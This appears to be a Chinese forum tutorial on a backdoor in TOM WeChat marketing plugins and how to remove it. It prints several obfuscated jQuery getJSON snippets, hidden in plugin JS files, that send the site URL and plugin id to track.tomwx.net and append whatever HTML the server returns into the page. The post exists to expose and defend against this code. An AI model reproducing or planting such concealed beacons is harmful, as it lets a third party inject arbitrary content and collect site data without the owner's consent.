前言：
TOM微信营销借着正版检测这个借口在程序上植入后门代码，这种做法是万万不能接受的，轻则影响用户体验、泄露用户隐私，重则危害服务器安全、系统崩溃！大大的隐患阿！！！
为此，小弟抱着普度众生的精神，为大家简单分析一下此漏洞及修复方法，小弟非技术人员，若有错误的地方还请各位前辈赐教。
说明：刚修改，不敢保证100%没有出错，故设为beta版，运行一段时间没有问题后改为正式版。

科普知识：

Quote后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。在软件的开发阶段，程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。但是，如果这些后门被其他人知道，或是在发布软件之前没有删除后门程序，那么它就成了安全风险，容易被黑客当成漏洞进行攻击。

技术原理：
TOM微信营销是利用AJAX技术，通过在插件里的某个必须调用的JS文件隐藏一段后门代码，在访问者打开的时候采用JSON方式与TOM服务器通信并返回数据。


修复之路：
知道了技术原理之后，我们就很容易找出这些后门代码了，关键词getJSON
第一阶段：定位植入后门代码的JS文件。
TOM的习惯是直接将JS代码直接放在插件目录下的images文件夹，通过重命名的方式定位寻找。
具体做法：把JS文件改一个名，例如"admin.js"重命名为"admin.js-"，再打开页面，如果没有出现TOM的授权警告黑幕提醒，那就锁定是这个文件搞鬼了！
常见后门代码存在于： 后台：admin.js，前端：插件名称.js，如wx.min.js，vote.min.js，zanrenqi.js


第二阶段：转换JS格式，方便阅读。
一般为了优化用户体验，提升网页浏览速度，很多JS文件会被格式化压缩（就是用文本软件打开后显示一行或几行），不方便阅读代码。
找出JS文件后，用格式转换工具转换为易于阅读的格式，具体操作步骤：
以站长工具的“JS/HTML格式化”为例：打开http://tool.chinaz.com/tools/jsformat.aspx 把JS代码复制上去，转换，把转换好的代码复制回文本编辑工具。

第三阶段：找出后门代码并删除。
搜索关键词getJSON，在最底部的位置一般会找到类似下面这种的代码，把整段代码（包含前面的var，后面的function(data)）全部删除，保存重新上传到服务器。搞掂！

jq.getJSON("ht" + "tp" + ":/" + "/t" + "r" + "a" + "ck" + ".to" + "mw" + "x." + "ne" + "t" + "/i" + "nde" + "x." + "php" + "?mo" + "d=s" + "ite" + "s_p" + "lu" + "gins" + "_v2&plugin_id=tom_yinglihe&callback=?",

后门代码写法可能不会固定，但也是大同小异，附TOM常用的后门代码：

var jq = jQuery.noConflict();
jq.getJSON("ht" + "tp" + ":/" + "/t" + "r" + "a" + "ck" + ".to" + "mw" + "x." + "ne" + "t" + "/i" + "nde" + "x." + "php" + "?mo" + "d=s" + "ite" + "s_p" + "lu" + "gins" + "_v2&plugin_id=tom_yinglihe&callback=?",
function(data) {
  if (data.status == 201) {
    jq('body').append(data.data);
  }
});

var uuuuuu = "t"+"r"+"a"+"c"+"k"+"."+"t"+"o"+"m"+"w"+"x"+"."+"n"+"e"+"t"+"/"+"i"+"n"+"d"+"ex"+".p"+"h"+"p?"+"mo"+"d="+"si"+"te"+"s_"+"pl"+"ug"+"in"+"s&"+"si"+"te_u"+"rl=";var jq=jQuery.noConflict();var goodsadmin=1;jq.getJSON("http://"+uuuuuu+usiteurl+"&p"+"lu"+"gi"+"n_id="+plugin_id+"&ch"+"e"+"ck=1&ca"+"llb"+"ack=?",function(data){if(data.status==201){jq('body').append(data.data);}});

if (check_r == '1') {
  $.getJSON("ht" + "t" + "p:/" + "/tr" + "ac" + "k" + ".t" + "omw" + "x." + "n" + "et" + "/i" + "nd" + "ex." + "ph" + "p" + "?mo" + "d=s" + "ite" + "s_p" + "lu" + "gi" + "ns&" + "sit" + "e_u" + "rl=" + usiteurl + "&p" + "lu" + "gin_id=" + plugin_id + "&ch" + "eck" + "=1&ca" + "ll" + "ba" + "ck" + "=?",
  function(data) {
    if (data.status == 201) {
      $('body').append(data.data)
    }
  })
}

$(document).ready(function(){$.getJSON("h"+"t"+"t"+"p:"+"/"+"/t"+"ra"+"ck"+".to"+"mw"+"x."+"ne"+"t/i"+"nde"+"x.p"+"hp"+"?mo"+"d="+"sit"+"es_"+"lo"+"g&"+"cal"+"lb"+"ack"+"=?",function(data){});});
function getQueryString(name) {
        var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)", "i");
        var r = window.location.search.substr(1)
                .match(reg);
        if (r != null) return unescape(r[2]);
        return null;
}

懒人包下载：
admin.js具初步鉴定，通用的！
下载地址(点击数字即可下载)→：21525